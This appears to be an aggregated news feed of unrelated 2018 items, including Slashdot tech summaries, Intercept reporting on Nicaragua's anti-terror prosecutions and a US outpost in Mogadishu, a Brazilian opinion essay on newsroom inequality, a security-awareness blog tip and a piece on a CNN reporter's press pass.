There Is No Link Between Insomnia and Early Death, Study Finds

A new report published in the journal Science Direct says there is no link between insomnia and early death. The researchers reportedly "reviewed 17 studies, which covered close to 37 million people, to compile their results," the BBC notes. From the report: This new report goes against what the NHS says, which claims that as well as putting people at risk of obesity, heart disease and type 2 diabetes, that insomnia shortens life expectancy. The NHS recommends things like exercising to tire yourself out during the day and cutting down on caffeine. It also says smoking, eating too much or drinking alcohol late at night can stop you from sleeping well. Other recommendations include writing a list of things that are playing on your mind and trying to get to bed at a similar time every night. "There was no difference in the odds of mortality for those individuals with symptoms of insomnia when compared to those without symptoms," the study says. "This finding was echoed in the assessment of the rate of mortality in those with and without symptoms of insomnia using the outcomes of multivariate models, with the most complete adjustment for potential confounders, as reported by the individual studies included in this meta-analysis. Additional analyses revealed a tendency for an increased risk of mortality associated with hypnotic use."

Read more of this story at Slashdot.

A New Senate Bill Would Hit Robocallers With Up To a $10,000 Fine For Every Call

Massachusetts Democratic Senator Ed Markey and South Dakota Republican Senator John Thune introduced a bill on Friday that aims to ramp up the penalties on illegal robocalls and stop scammers from sending them. Gizmodo reports: The Telephone Robocall Abuse Criminal Enforcement and Deterrence (TRACED) Act raises the penalty for robocalls from $1,500 per call to up to $10,000 per call, and allows the Federal Communications Commission (FCC) to take action on illegal robocalls up to three years after the calls are placed, instead of a year. The Act also aims to push the FCC to work along with the Consumer Financial Protection Bureau, Department of Justice, Department of Homeland Security, Federal Trade Commission (FTC), and other agencies to provide information to Congress about advancements in hindering robocalls and prosecuting scammers. Perhaps most importantly for us highly annoyed Americans, the bill would also force phone service providers to use call authentication that filters out illegitimate calls before they go through to consumers.

How Nicaragua Uses Anti-Terror Laws Against Protesters to Suppress Dissidents

When Mariela Cerrato saw her daughter and son-in-law on the news in late July, surrounded by masked police officers and described as terrorists, she was not surprised. She knew the authorities had been after the couple for some time.

Their business had been set on fire days earlier, and a wanted poster bearing their faces had been circulating on social media. Paramilitaries wearing balaclavas had gone to Cerrato's house to demand that she reveal where her daughter and son-in-law were. What she did not know was that the couple had been moving from hideout to hideout. The last time she had seen them, in mid-July, they were preparing to flee the small city of Masaya, in western Nicaragua, hoping to reach Costa Rica.


Now Mariela's daughter, Maria Peralta, and her husband, Christian Fajardo, are in a maximum-security jail in Managua, the country's capital, facing up to 30 years in prison. They are just two of the more than 400 activists arrested and prosecuted as part of President Daniel Ortega's crackdown on protesters who have been demanding his resignation.

Mariela Cerrato, whose daughter and son-in-law were charged with terrorism after taking part in protests against Nicaragua's president, Daniel Ortega.

Photo: Carlos Scopio

Nicaragua plunged into violent unrest after protests began on April 18, set off by an unpopular change to the country's social security system. The demonstrations soon expanded into a nationwide, student-led movement against Ortega, whom critics accuse of imposing increasingly authoritarian measures during his 12 years in power. Thousands of people who took to the streets were met by heavily armed police and paramilitary groups, who fired on the crowds, tortured and raped detainees, and arbitrarily arrested leaders, according to the U.N. The toll was more than 300 dead, more than 2,000 injured, and another 2,000 arrested.

Although the streets are now clear of barricades and the crisis appears to be over, the country remains deeply turbulent. More than 40,000 Nicaraguans are seeking refuge in Costa Rica, according to the authorities, and about 13,700 of them have formally requested asylum. The Nicaraguan Center for Human Rights says that more than 550 of the country's citizens are still imprisoned, and the government continues to hunt down and capture its opponents, among them students, farmers, and relatives of those who were killed. Last month, the police issued a statement banning unauthorized protests.

Many of those arrested will be tried as terrorists, thanks to a law passed in July by the Ortega-controlled Congress that expanded the definition of terrorism to include a range of crimes, such as the destruction of property. Those convicted face 15 to 20 years in prison. According to Roberto Larios, communications director for the courts, more than 200 people have been charged with terrorism. At least 18 of them have been found guilty so far. Their cases mark the first time anyone has been convicted of terrorism in Nicaragua.

The state says the law was passed to bring the country into line with the recommendations of the Financial Action Task Force, or FATF, an international organization dedicated to curbing the financing of terrorism. Former prosecutors, lawyers, activists, and protesters say that, whatever its original purpose, the law is now being used to criminalize protest and serves as a pretext for Ortega to silence his critics.

“The law is so open-ended that it can be applied to any activity, even passing a bag of water to someone at a barricade. (…) What we are seeing is a civil rebellion, a social rebellion; this is not terrorism,” said Alberto Novoa, a former attorney general of Nicaragua, in an interview with a local newspaper.

Nicaragua is not alone in expanding its definition of “terrorism” to the point where activists and protesters end up behind bars. Ortega is only the latest in a long line of rulers who have passed sweeping anti-terrorism laws that, according to activists, can be used to violate civil liberties. In recent decades, more than 140 countries have adopted counterterrorism measures, but countries have increasingly used these laws as “shortcuts to attack democratic protest and opposition,” as explained by Fionnuala Ní Aoláin, the U.N. special rapporteur on the protection and promotion of human rights in countering terrorism. A United Nations report released this year highlighted the trend of labeling human rights defenders, activists, and experts as “terrorists” in countries such as Algeria, Egypt, and the Philippines, among others. The Center for Strategic and International Studies has also noted that several countries besides Nicaragua have used the FATF's counterterrorism measures to justify passing restrictive laws in recent years.

“From Brazil and Nicaragua to France and the United Kingdom, to Kyrgyzstan and Australia, we are seeing crackdowns that make it all too easy to label protesters, journalists, activists, political opponents, and others the authorities want to neutralize as ‘terrorists’ and ‘extremists,’” said Letta Tayler, a senior terrorism researcher at Human Rights Watch. “We have seen a dangerous global expansion of draconian counterterrorism laws since the attacks of September 11, 2001. (…) Because the word terrorism is associated with atrocities, it is now easy to get the public to buy into responses that break the law in the name of security.”

Fears about the Islamic State (ISIS) spurred a recent avalanche of laws in many countries, Tayler said. Even in Latin America, where the threat of an ISIS attack is remote, the word “terrorist” has begun to seep into public discourse. Honduras passed anti-terror legislation in September that could send protesters to prison for 15 to 20 years. Unlike Nicaragua, Honduras has not used the law against those who took part in protests during its electoral crisis, but some protest leaders remain in prison. In Ecuador, Colombia, and Chile, Indigenous and environmental activists have been charged with terrorism. In 2016, Brazil passed an anti-terrorism law that was criticized by the U.N. and by experts for its broad definition of terrorism. El Salvador's supreme court classified gang members as terrorists and modified existing anti-terrorism legislation to also implicate anyone who collaborates with them, a move that some say is being used to justify repression and to request international aid. Venezuela passed a controversial anti-terrorism law in 2012, and President Nicolás Maduro declared that the 2017 protests that swept the country were promoted by “terrorist groups.”

Guatemala is considering sweeping anti-terrorism legislation that would restrict civil liberties and freedom of expression, according to civil society groups. Under the law, anyone who blocks highways, damages private property, or uses social media for “political or economic ends,” among other actions that could cause “panic and fear in the population,” could be tried for terrorism. “When rulers need an enemy and need to mobilize the people against that enemy, confuse the people about the truth, and shut down debate, ‘terrorism’ is now an option,” says Adam Isacson, a senior associate at the Washington Office on Latin America.

A Nicaraguan is arrested by riot police during a protest against the Ortega government in Managua, Nicaragua, on October 14, 2018.

Photo: Inti Ocon/AFP/Getty Images

There is no universal legal definition of terrorism, but in Nicaragua, terrorist acts are now defined as those that result in death, injury, or damage to property, public or private, when the purpose of the act was to “intimidate a population, alter the constitutional order, or compel a government or an international organization to carry out an act or refrain from doing so.”

Novoa, the former attorney general, is challenging the new anti-terror measure in court, arguing that the law is unconstitutional and should not apply to protesters. “I am challenging the law because I wanted to see whether one day they tell me that the logical legal arguments are in favor of weakening the rights of citizens established in the social pact called the Nicaraguan Constitution,” he wrote to The Intercept in an email. “Independence, autonomy, and impartiality do not exist in the Nicaraguan state, since all formal powers are controlled by Mr. Ortega and Mrs. Murillo,” he said, referring to Ortega's wife, who is the vice president. “The judicial system is a political arm of the repression used against those who think differently from Ortega and Murillo.”

Julio Montenegro, a human rights lawyer who is handling the cases of Christian Fajardo and Maria Peralta, said that some of the individuals charged with terrorism had merely been part of a street barricade, brought supplies, food, and water to other protesters, or offered medical care to the wounded. The U.N. has also expressed concern about the prosecutions, noting in a scathing report that “the trials of people connected to the protests have serious flaws and do not follow due process, including the impartiality of the courts.”

As Maduro did in Venezuela, Ortega has used classic autocratic tactics to crush the opposition. The government has denied the state's role in the violence, and Ortega has changed his account several times as to whether or not the masked paramilitaries seen in videos working alongside the police were his supporters. Ortega has painted a picture of the protesters as the sole cause of the chaos and portrayed government forces as the peaceful defenders of the country against terrorists bent on destabilizing the nation.

While human rights groups say the death toll has reached at least 300, with some suggesting as many as 500, the Nicaraguan government acknowledges only 198 victims, including 22 police officers killed; in one case, an officer was stripped and burned alive. At pro-government rallies, the president's supporters chant that “they were terrorists, not students!” Ortega himself has called for justice on behalf of those killed on the government side, saying that the country has entered “a moment of justice and reparation for the 198 victims of coup-mongering terrorism.” To date, no paramilitary or member of the police has been tried for terrorism or any other crime.

A photo of Maria Peralta and Christian Fajardo, who remain in prison awaiting trial.

Photo: Carlos Scopio

Scrolling through videos of Fajardo leading hundreds of protesters in an anti-government march in Masaya, his mother-in-law, Mariela Cerrato, described his role as a leader in the movement. When protesters took control of the city in June, Fajardo and Peralta oversaw the campaign, Cerrato explained. “If there was no water, food, lights, etc., Christian was the one responsible. (…) But he wasn't at the barricades; he didn't have time. (…) Taking statements, caring for the sick (…) they were supplying the health posts that were here in Masaya,” Mariela continued, pointing to a corner of her house filled with syringes, bandages, and crutches.

Masaya, located 24 kilometers southeast of Managua, was long a bastion of support for Ortega and his leftist rebels, the Sandinistas, when they overthrew the conservative dictator Anastasio Somoza in 1979. But in 2018, the city became the center of resistance against Ortega. Protesters took over the city, but police, paramilitaries, and government snipers managed to regain control after a particularly brutal and bloody offensive in which government forces used explosives, fired on protesters, and arrested their leaders.

“What is terrorism? When there is the will and intent to cause panic among citizens,” said Montenegro, the lawyer for Fajardo and Peralta. “Attacks causing panic were not carried out by Christian and Maria, but by paramilitaries linked to the police.”

In addition to terrorism and financing of terrorism, Fajardo and Peralta were charged with participation in organized crime and obstruction of public services, crimes for which the state has not yet provided evidence to the case, according to Montenegro. Montenegro and Cerrato, who is also a constitutional lawyer, say the government has violated rights and circumvented due process from the arrest through to the trial.

On the first day of Fajardo and Peralta's hearing in August, Cerrato arrived at the courthouse at 6 a.m. At 9, activists joined her, waving flags bearing the couple's faces, while police officers in balaclavas with M16 rifles watched them. As the hearing kept being delayed throughout the day, she waited 10 hours until she finally entered the building. By then, the activists and TV cameras had already left, and she was accompanied by a group of about 25 women, all waiting in the rain to deliver food to their imprisoned relatives and friends. At 8 p.m., she returned to say that she was never allowed into the hearing.

The next morning, Cerrato walked through her daughter and son-in-law's unfinished house, which sits next to her own. Clothes still lay on the bed, and a white-and-orange cat stretched out in the middle of the kitchen.

The couple's trial is now set for mid-November. In the meantime, Cerrato has begun working on behalf of Santiago Fajardo, Christian's brother, who was also arrested and charged with terrorism. Her effort is not without its dangers. At a demonstration she took part in during September, calling for the release of the imprisoned protesters, police used tear gas and fired rubber bullets while armed Ortega supporters opened fire; one person was killed and five others were wounded.

“I am proud that these young people took part in this fight,” she said. “I am not afraid. I leave my door open. The paramilitaries come and I look at them, I ask what they want. If they want to kill me, they can kill me.”

Translation: Maíra Santos

The post How Nicaragua Uses Anti-Terror Laws Against Protesters to Suppress Dissidents appeared first on The Intercept.

Listen to More Racionais and Pay Your Employees Better

‘Left-wing intellectual’ and ‘playboy’ tend to be synonyms. And the big problem is that the intellectual doesn't know it. He thinks a playboy is only someone who goes to Miami, buys an expensive car, and lives a culturally mediocre little life. But excuse me: a nouveau-riche bourgeois who listens to sertanejo universitário is more up to date on national culture than someone who still thinks the Chico Buarque of 2018 is the Chico Buarque. There is no problem with listening to Chico. The fucked-up thing is listening only as far as Chico. It is as if all Brazilian cultural production after redemocratization had been forgotten.

And the press is full of these intellectual-playboys.

As we explained here, Olavo Carvalho became the most influential thinker in Bolsonaro's Brazil by claiming that the left took over academia and the press, embodying the discourse of defending the weak and oppressed while securing its own private privileges. If we consider what Olavo wrote, it is reasonable to admit that, during the Lula government, the left was intellectually lazy and became a little circle dance to the sound of Tribalistas. It failed to realize that Brazil keeps changing.

Diametrically opposed to Olavo, Racionais MC's tried to warn us of something similar. In 2002, the album “Nada como um dia após o outro dia” was released. On it, Brown warns the listener. And he does so more than once. I cite two instances here, the first on the track “Negro Drama”:

“Problems with school, I have a thousand.
A thousand things. Unbelievable, but your son imitates me.
Among you all, he's the sharpest.
He's got swagger and talks slang. Not slang; dialect.”

Defending Lula/Haddad without understanding what generated Bolsonarism is a way of thinking that is, by the yardstick of time, behind. And that is why the Brazilian intelligentsia is incapable of talking with Bolsonaro. When he went on Roda Viva in July and danced the lambada with his interviewers, he confirmed the idea that in the Lula/Bolsonaro relationship, the misunderstood one is the captain. He was dealing with journalists who had been defending the same things for years and did not understand how an opposing force of that size could have arisen.

I'm sorry if you only became aware at that point, but Jair Bolsonaro knew by heart which questions would come from that kind of journalism. He was the news. The panel from Brazil's traditional media had no idea how to deal with that congressman. The interviewers were on the verge of a nervous breakdown.

I don't think the press kept up with the pace of the discussion, because it was operating in emergency mode to prevent a catastrophe. By catastrophe, you can understand the election of Bolsonaro and the threat of the end of the democratic rule of law [piauí, Intercept] or the election of Haddad, tolerance of corruption, and the collapse of the country's political institutions [Estadão, Gazeta do Povo]. Either way. Neither side was willing to consider its opponents' arguments.

By elimination, the side of journalism I sympathize with is the one that customarily defends progressivism. And my problem with what I would call my side of journalism is that although it tried to prevent Bolsonaro's victory, it shares a professional ethic that did not include those who benefit most from its ideology: the poor. In simpler terms: we try to prevent a swing toward conservatism when we produce information, but newsrooms are not, by a long shot, an inclusive environment. Bolsonaro laughs at us because, in comparative terms, the group that produces the thinking that opposes him has fewer Black people than it should.

Brazilian journalism bothers me because it does not make public the working conditions it subjected me to. It does not admit that it dispenses with a small dose of censorship from its peers and, even though it does not stop me from speaking, it does not take my argument seriously.

We confuse Black and poor all the time in Brazil. We need to understand that we have a social disease that kills Black people, but it is society's negligence that prevents anyone from ceasing to be poor. They are similar things, but different. If you confuse them, you may end up failing to understand how a poor person can vote for Bolsonaro if he, in theory, says he will take active measures against violence that will directly affect Black people.

The second example from Racionais is on the track “Jesus chorou.” First, Brown's mother warns:

“Paulo, wake up! Think about the future, because this is an illusion.
Black people themselves don't even care about this.
Look how much I've suffered, what I am, what I was!
Envy kills a person, there are a lot of bad people.”

Brown had no way of knowing, in the year Lula was elected and Santos won the Brazilian championship, that he would be a potential candidate for greatest Black man in Brazil's history. But he knew even then that just because he was telling the story of the hood, it did not mean he was the whole hood.

For me, the message of Racionais has always been this: there is nothing to celebrate. Brown wrote that in 2002. The tally of innocent deaths has never fallen enough for us to lower our guard.

If the left failed to grasp his message, it is because those who believed they were looking after Brazilian popular culture were a club interested in keeping its power and influence. Take MPB as an example: the term “música popular brasileira” is not a musical genre. It is a club. All the other genres (samba, funk, reggae, forró, tecnobrega, sertanejo) carry a specific name because they have specific features of rhythm and timbre. MPB has no such characteristics. If you hang out with someone who is part of the crowd, you join the crowd.

If we still turn to the seasoned figures of the '70s, it is because Brown's warnings did no good at all. If we try to understand the world in the terms we used to understand it back then, we are as behind the times as the idea of “Brazil above everything, God above everyone,” a clear reference to the “March of the Family with God for Liberty,” which preceded the dictatorship. The new right is honest at least as far as the organic representation of its interests is concerned: these are the ideas of a white bourgeoisie that values the country dweller (as long as he is a large landowner), likes sertanejo, wants to go around armed, and asks its new president to guarantee its rights. The left is the opposite of that: drained of representation, it appears to be a group whose discourse is dictated by intellectuals who almost never resemble what they defend. In the battle of backwardness, the left loses because it sounds more hypocritical. What matters is not what is defended, but the perception that there is a group that is just paying lip service.

Bolsonaro is, at most, a grunt from 1985, the last year of the military regime, to warn that the intellectual left should have gone beyond Chico Buarque, Sócrates of Corinthians, and the heroes of redemocratization. These are the democratic references of Folha de S.Paulo, not of humanity. The chic left needs to step out of the center of the world and understand that it is normal for people not to like its ideas.

So far, I have presented two arguments: in the first, I tried to show that the opposition to Bolsonaro in the media has a fainting fit every time it tries to understand him. In the second, I said that cultural Olavism and the message of Racionais speak to each other insofar as they show us that the elite has always played innocent in the national tragedy. Even though bringing Olavo's thinking close to the lyrics of Racionais is apparent idiocy, it is reasonable to say that the intellectual-playboy turns up his nose equally when he has to seriously study either of the two phenomena. And each in its own way, both are fitting responses to the reality observed in the '90s. Both say that there is someone trying to speak in the name of the people.

The press will never have an opinion rooted in reality as long as its newsroom directors do not get over their squeamishness. Of course no one is obliged to become a fan of something they don't like, but it strikes me as unprofessional that a journalist could ignore such relevant products of our culture. Nor is it the current financial crisis in journalism that is causing a noticeable worsening in the market. It was already rotten inside. It has been a decade since newsrooms began to be downsized. There was time for an editor to have concluded that with half his salary, he could fill a newsroom with Black students. But they never did that.

And it gets even worse: Brazilian journalism does not properly value the work of those now entering the market because it starts from our old Brazilian principle that knowledge resides exclusively in newsrooms and universities. It is a bunch of people who do not even know how to understand the value of professionals trained by the internet trying to justify that you can pay peanuts for an employee to do work that is highly stressful and purports to be skilled.

Journalism is a middle-class profession. I and almost all my colleagues, when we started out, agreed to earn less than R$ 1,500 to work exhausting hours on the justification that “that's just how the profession is.” It isn't.

It would be if the rule applied to everyone. But whoever told me that earned more than I did and did not know what my rent cost. Whoever told me that ignored the fact that they could only hire employees if, in partnership with the company, those employees' parents helped pay the rent. This happens in every profession, but in the newsroom of an outlet with left-wing people (not that the right-wing ones pay better), the director enjoys discussing Marxism and pretending to care about class struggle. It is the intelligentsia in action. Totally live.

For those who are not well-off, given the level of qualification required to be part of a newsroom, working as a salesperson at the mall, doing odd jobs, or looking for work in related areas of communications makes more sense, because it pays more. Even in Brazil, it is not as if it were impossible to earn two minimum wages with a university degree in hand. Newsrooms stayed white by choice, not by circumstance.

When you arrive at the newsroom freshly showered, with your clothes ironed and perfume on, people think you came from the same place they did. They think your commute, your way of dealing with bills, and the reality you face are the same as those of the Partido Socialismo em Laranjeiras (PSOL), Laranjeiras being a neighborhood in Rio's south zone where the city's festive left tends to gather. And almost always it is not.

My grandfather was Black with kinky hair, my father was Black with green eyes. I never went around calling myself Black, even though at private school I was the Black one by contrast. At any point in my life, I would feel very hypocritical posing as Black, because Mano Brown explained to me that I couldn't. “Hey, big shot, who made you so good?”

Even so, I once tried to show “Não uso sapato,” by Charlie Brown Jr., to an older colleague who had made his career at Folha. You may think it's a cliché, but do you know what he did?

He showed me “Going to California,” by Led Zeppelin. There was Robert Plant, that pale little beanpole, in tights, singing his fucking heart out. I knew who he was, but the comment fucked with my head: “Now that is singing. Just look!” I had already heard something similar in college, when a professor asked the class whether we “knew that band called the Ramones.”

The elite that runs journalism did not understand the internet. The web took the monopoly on speech away from newsrooms and academia. Being part of the intelligentsia in the 20th century required money because you needed to buy books, films, and records. I downloaded everything. I know what Led Zeppelin is because I did not have to pay to listen. Time passed and rock stopped being the fashionable genre.

My generation is the generation of rap and hip-hop. Journalists need to understand that being a rocker, a fan of Tropicália and at most of Titãs, stopped being revolutionary around the time Collor was elected.

Disagree? That's fine. But if you don't know it, go listen.

The revolution I advocate will only speak to the playboy journalist when the playboy journalist learns to talk about money with those who have less. Our original violence is slavery. That gives us the mindset of master and servant. That makes us think we can give ourselves the right, after having studied so much, to pretend we don't know what is happening in the real world.

But we need to keep raising our hands to say that we need to see Black people in newsrooms. If they are the ones we are trying to defend, then they are the ones who need to be present when we discuss their issues. Not only because we should step back and ease our responsibility, but because we need to make our professional tensions better represent the distribution of identities in the Brazilian population. Looking from afar, we tend to have a paternalistic view that flattens reality and wants to decide on behalf of others. And if we agree that this is an important issue, then we need to reach a consensus about the reasons why we are still so far from solving the problem.

It is essential that everyone get used to having Black colleagues. And get used to what is and has been discussed in rap. And that we stop turning exclusively to the symbols of an era that is in the past, forgetting the generation that has grown up since then. The heroes of my time were not exiled from Brazil; they were born in the ghettos of their own homeland.

Perhaps we are frightened because we have finally become aware of what was really happening here. Perhaps our fear is a belated realization of the country we have always been, and not of what we will become over the next four years.

You may have forgotten during the elections, but doing the right thing around here has never been popular opinion. And if you made it to the end of this text, I ask you: does everyone at your company have the money to have lunch with you?

Se não, volte pra base.

The post Ouça mais Racionais e pague melhor os seus funcionários appeared first on The Intercept.

Mid-Range Google ‘Pixel 3 Lite’ Leaks With Snapdragon 670, Headphone Jack

The first alleged images of the rumored "budget" Pixel 3 have been leaked. The Pixel 3 Lite, as it is being called, looks very similar to the Pixel 3, although it features a plastic build construction, slower processor, and a headphone jack. 9to5Google reports: Just like the standard Pixel 3, there's a display that's roughly 5.56-inches in size, but this time it's an IPS LCD panel at 2220x1080 rather than an OLED panel. Obviously, there's also no notch to be seen on this alleged Pixel 3 Lite. There's a single front-facing camera as well as one speaker above that display, relatively thick bezels on the top and bottom, and a speaker along the bottom of the device as well. Perhaps most interesting when it comes to the hardware, though, is that there's a headphone jack on the top of the phone. That's certainly unexpected since the Pixel 2 dropped the jack and Google hasn't looked back since. Tests from Rozetked reveal some of the specifications running this device as well. That includes a Snapdragon 670 chipset, 4GB of RAM, and 32GB of storage. Previous reports have pointed to a Snapdragon 710. Battery capacity on this device is also reported at 2915 mAh and there's a USB-C port along the bottom. It is rumored to include the same 12MP and 8MP cameras found in the standard Pixel 3 and Pixel 3 XL, which will be a huge selling point for the affordable phone market. The price is expected to be around $400-500.

Read more of this story at Slashdot.

NBlog Nov 17 – all quiet? TOO quiet?


Don’t just hoard your feedback and metrics: use them! Squeeze every last drop of value from them!

It is all too easy to down-play or dismiss comments and especially criticisms about the awareness program. Resist your natural defensive tendencies. Collate and take another, dispassionate look at your awareness metrics and the feedback you have received in recent months concerning information security and/or the awareness and training program. Try to identify common threads or themes that might have escaped your attention previously, or that seem to crop up repeatedly.

This kind of review is best conducted as a team exercise, better still if you persuade some of your most vocal/persistent critics to get actively involved (invite them to your review meetings, give them the floor and listen hard to what they have to say!). SWOT analysis and brainstorming techniques can help tease out genuine concerns and novel ways to tackle them. For example, if your budget is a serious constraint on the awareness program, there may be free/cheap alternatives and more efficient and effective ways of using whatever you have. 

Metrics and verbatim comments from your audience demonstrating demand for and appreciation of your awareness and training activities should make your status reports more positive and budget requests more compelling.

If you aren't getting much in the way of feedback, don’t rest on your laurels. Perhaps the awareness program is going extremely well, but are you really doing enough to encourage feedback, or are people too lazy or too intimidated to respond? Consider commissioning an independent third party to conduct an anonymous survey on your behalf, or at least set aside a few minutes every day to call or visit people to find out what they truly think. Write yourself a basic script if it helps, e.g. start by asking questions about current or recent awareness topics and activities/events.

Federal judge reinstates CNN reporter’s press pass after Trump revoked it for critical coverage

In an important victory for press freedom, Federal Judge Timothy Kelly ordered the Trump administration on Friday to temporarily reinstate CNN White House correspondent Jim Acosta’s press credentials.

“We are gratified with this result and we look forward to a full resolution in the coming days,” CNN said in a statement. “Our sincere thanks to all who have supported not just CNN, but a free, strong and independent American press.”

The White House unilaterally revoked Acosta’s press pass last week, following a tense press conference in which Acosta aggressively questioned the president about the special counsel’s Russia investigation.

On November 13, CNN and Acosta filed a lawsuit against Donald Trump as well as other administration officials, alleging that the White House’s suspension of Acosta’s press credentials had violated Acosta’s Fifth Amendment rights.

“Because CNN’s chief White House correspondent has effectively been prohibited from reporting from the White House and the President’s trips, its newsgathering and reporting abilities have been significantly hampered, causing harm not just to CNN, but also to its many viewers and readers who rely on CNN as an essential news source,” reads the complaint by CNN [PDF].

As CNN reported from the court proceedings earlier this week, the Trump administration lawyer made the rather illuminating argument “that it would be perfectly legal for the White House to revoke a journalist's credentials if it didn't agree with their reporting.”

President Trump has spent his two years in office incessantly threatening his critics and attacking the press. But over and over, Trump has disproportionately targeted and insulted CNN, and specifically Jim Acosta.

When Acosta tried to ask Trump a question days before the president’s inauguration in 2017, he refused. “I’m not going to give you a question,” he said. “You are fake news.”

Jim Acosta’s reporting style is perhaps more direct and belligerent than other reporters with the White House press corps. His willingness to ask Trump tough questions and hold him to answering them is critical in the face of an administration that readily lies and manipulates the truth.

CNN is standing by Acosta, and it’s not the only one. Numerous news organizations — including the Associated Press, Bloomberg, First Look Media, the New York Times, the Washington Post, and Fox News — have filed amicus briefs in support of the lawsuit.

When a reporter asked Trump how long he would leave Acosta “in the penalty box”, the president responded: “As far as I’m concerned, I haven’t made that decision. But it could be others also.”

The White House retaliating against a reporter it doesn't like by denying him access altogether is a threat to all reporting on the president.

“If this kind of retaliation were allowed to go unchallenged, the White House would feel emboldened to use the threat of similar revocations as a means of discouraging critical news coverage,” Katie Fallow and Jameel Jaffer warned in the Columbia Journalism Review. “Other reporters would inevitably hesitate before asking White House officials sharp questions. If the president were allowed to ban reporters whose questions he didn’t like, the result would be press conferences that served only to celebrate, and not challenge, the administration’s agenda.”

In response to CNN’s suit, the government has argued that no one has a constitutional right to a press pass, and the president has the authority to decide which journalists he speaks with and allows into the White House.

“No journalist has a First Amendment right to enter the White House and the President need not survive First Amendment scrutiny whenever he exercises his discretion to deny an individual journalist one of the many hundreds of passes granting on-demand access to the White House complex,” the government’s attorneys wrote in an opposition to CNN’s motion [PDF].

The government’s argument may seem intuitive — as one Twitter user joked, “If having a press pass is a right, I want one!” — but it sidesteps the actual issues in the case.

“The question here is not, does anybody claiming to be a journalist have the right to attend a briefing at the White House or access to the White House facilities?” Jonathan Peters, a professor of journalism and law at the University of Georgia, told Freedom of the Press Foundation. “The question is, what process is due a journalist who has received a press pass from the White House before the White House revokes it? And, can the White House revoke a press pass based on [the journalist’s] content and viewpoint?”

In other words, Acosta may not have a right to a press pass, but he does have the right not to have the government arbitrarily take his press pass away.

Timothy Kelly, the federal judge presiding over CNN’s case against the president, seemed to accept that reasoning when he granted CNN’s motion for a temporary restraining order on Friday.

Following the judge’s order, the White House begrudgingly reinstated Acosta’s press pass, but the lawsuit remains ongoing.

In remarks at the Oval Office, President Trump suggested that he would ultimately prevail in court, once the White House set up a standard process for revoking journalists’ press credentials.

“You have to act with respect when you’re at the White House, and when I see the way some of my people get treated at news conferences, it’s terrible. So we’re setting up a certain standard, which is what the court is requesting,” he said.

“We will end up back in court and we will win,” he added.

Cheaper, Disc-Free Xbox One Coming Next Year, Report Says

An anonymous reader quotes a report from Ars Technica: Microsoft is planning to release a disc-free version of the Xbox One as early as next spring, according to an unsourced report from author Brad Sams of Thurrott.com (who has been reliable with early Xbox-related information in the past). The report suggests the disc-free version of the system would not replace the existing Xbox One hardware, and it would instead represent "the lowest possible price for the Xbox One S console." Sams says that price could come in at $199 "or lower," a significant reduction from the system's current $299 starting price (but not as compelling compared to $199 deals for the Xbox One and PS4 planned for Black Friday this year). Buyers will also be able to add a subscription to the Xbox Games Pass program for as little as $1, according to Sams. For players who already have games on disc, Sams says Microsoft will offer a "disc to digital" program in association with participating publishers. Players will be able to take their discs into participating retailers (including Microsoft Stores) and trade them in for a "digital entitlement" that can be applied to their Xbox Live account.

Read more of this story at Slashdot.

U.S. Returns to Mogadishu With Revamped Diplomatic Outpost, 25 Years After “Black Hawk Down” Battle

The United States has maintained an arms-length diplomatic relationship with Somalia since two American Black Hawk helicopters were shot down in Mogadishu in 1993. But an increase in activity in recent years is set to culminate this weekend, with the quiet opening of a renovated and expanded building that will apparently serve as an unofficial U.S. embassy or consulate in Mogadishu, according to diplomatic and other sources in the city. The facility will allow for a permanent diplomatic presence in the country, a place for the U.S. to host meetings and for limited staff to be based.

U.S. officials are reluctant to discuss the building and its intended uses; the government seems keen to indicate it is neither an embassy nor a consular office. However, in a sign of the apparent importance of the building, the new U.S. ambassador to Somalia, Donald Yamamoto, who is based in neighboring Kenya, arrived in Mogadishu this week and is expected to formally inaugurate the facility on Saturday. Despite requests, the State Department would not allow an Intercept reporter to attend the opening ceremony.

The U.S. has not had an embassy or consulate in Somalia since 1991, when Americans were evacuated amid an anti-government uprising that catalyzed the complete collapse of the Somali state and deepened a long and bloody civil war. Relations between the U.S. and Somalia took a historic turn two years later with the “Black Hawk Down” incident, which took place during a U.S.-led military intervention precipitated by food shortages and political chaos. In that famous incident, two U.S. military helicopters were shot down, and a total of 18 American soldiers were killed during a raid to capture allies of a Somali warlord, Mohamed Farah Aidid. The Black Hawks crashed into Bakara, the main market in Mogadishu, sparking a 15-hour gun battle; the bodies of some of the U.S. soldiers were dragged through the streets. Those gory images and the subsequent national horror have since shaped U.S. policy abroad, influencing former President Bill Clinton’s decision not to put boots on the ground to intervene in the 1994 genocide in Rwanda or in Bosnia.

The U.S. building is located in Mogadishu’s equivalent of what was known as the “Green Zone” in Baghdad during the U.S. occupation of Iraq. At the moment, the vast majority of foreigners who come to the Somali capital do not even leave the massive airport complex-cum-military base that stretches across a section of the Mogadishu shoreline. The compound, secured by blast walls, is protected by the African Union Mission in Somalia and is entirely segregated from the rest of the city. Even Somali politicians entering the compound have to go through airport-style security managed by Ugandan soldiers. Along with the United Nations camp and security contractors, the U.K. and the EU keep embassies inside the airport. Turkey, Saudi Arabia, and the Gulf States have embassies in the city proper (a move greatly appreciated by the public, many of whom find it offensive that foreigners would come to work in their country but never actually leave the airport compound).

That the building is technically not an embassy or a consulate, but has been fixed up for diplomatic uses in the renovation, is likely a compromise between government officials pushing for a concrete diplomatic presence, and those who are more gun shy. But Americans, foreigners, and Somalis who work in the airport compound refer to the building as “the embassy” in passing, and the distinction will likely remain a technicality on the ground. It is not known if the American flag will be raised outside of this building.

During former Secretary of State John Kerry’s surprise visit to Somalia in 2015, U.S. officials floated plans to reinstate an embassy before the end of the Obama administration’s term. A building was at least partially erected, but over time the U.S. has been walking back plans for its completion. The likely factors for the delay are increased safety guidelines instituted in the wake of the attack on the U.S. mission in Benghazi in Libya, in 2012, and the continuously delicate security situation in Somalia.

The militant group al Shabaab, an Al Qaeda offshoot, is omnipresent and active in Somalia, and contributes to a high level of insecurity. Less than two weeks ago, at least 50 people were killed in dual car bombs in Mogadishu. Small-scale attacks and assassinations are a regular occurrence, and last year, al Shabaab staged a particularly bloody attack, bombing a busy junction at rush hour and killing between 500 and 1,000 people.

Since the Black Hawk incident, the U.S. has generally kept diplomatic staffers out of Somalia, while contributing significant amounts of humanitarian assistance and conducting drone strikes and airstrikes to destabilize al Shabaab, which is at war with the internationally recognized government in Mogadishu. In recent years, most U.S. diplomatic activity on the ground has consisted of day visits to the capital.

